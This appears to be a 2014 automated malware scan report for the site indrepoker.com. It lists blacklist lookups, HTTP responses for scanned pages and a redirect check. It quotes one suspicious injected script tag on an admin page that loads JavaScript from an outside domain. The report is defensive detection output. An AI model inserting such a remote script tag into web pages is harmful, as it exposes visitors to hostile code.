Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=indrepoker.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://indrepoker.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.indrepoker.com/ | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://www.indrepoker.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Tue, 26 Aug 2014 10:25:29 GMT Location: http://www.indrepoker.com/member/404.php Server: Apache Vary: Accept-Encoding Content-Length: 224 Content-Type: text/html; charset=iso-8859-1 Set-Cookie: mediaplanBAK=R129290829; path=/; expires=Tue, 26-Aug-2014 11:42:26 GMT Set-Cookie: mediaplan=R3757017825; path=/; expires=Tue, 26-Aug-2014 11:39:21 GMT | clean |
http://www.indrepoker.com/member/404.php | HTTP/1.1 302 Found Cache-Control: no-cache, must-revalidate Connection: close Date: Tue, 26 Aug 2014 10:25:29 GMT Pragma: no-cache Location: http://www.indrepoker.com/member/maintain.php Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=iso-8859-1 Set-Cookie: mediaplanBAK=R129298452; path=/; expires=Tue, 26-Aug-2014 11:42:26 GMT Set-Cookie: mediaplan=R3757017825; path=/; expires=Tue, 26-Aug-2014 11:33:40 GMT Set-Cookie: CPRC_data=a%3A2%3A%7Bs%3A7%3A%22user_id%22%3Bi%3A-1%3Bs%3A10%3A%22session_id%22%3Bs%3A64%3A%224605bb54e72d83fb50d6d011cbf25555b9641e9ac6dbbf6d3a5964a50684ad71%22%3B%7D; expires=Wednesday, 26-Aug-15 10:25:29 GMT; path=/ X-Powered-By: PHP/4.4.9 | clean |
http://www.indrepoker.com/member/maintain.php | 200 OK Content-Length: 1965 Content-Type: text/html | clean |
http://www.indrepoker.com/member/../admin/admin_index.php | 200 OK Content-Length: 3044 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://www.shadonia.com/aeffacer/dtd.php?id="></script> | ||
http://www.indrepoker.com/kernel/framework/js/scriptaculous/prototype.js | 200 OK Content-Length: 129738 Content-Type: application/javascript | clean |
http://www.indrepoker.com/kernel/framework/js/scriptaculous/scriptaculous.js | 200 OK Content-Length: 2644 Content-Type: application/javascript | clean |
http://www.indrepoker.com/kernel/framework/js/global.js | 200 OK Content-Length: 21456 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: indrepoker.com
Result:
GET / HTTP/1.1
Host: indrepoker.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: indrepoker.com
Referer: http://www.google.com/search?q=indrepoker.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: indrepoker.com
Referer: http://www.google.com/search?q=indrepoker.com
Result:
The result is similar to the first query. There are no suspicious redirects found.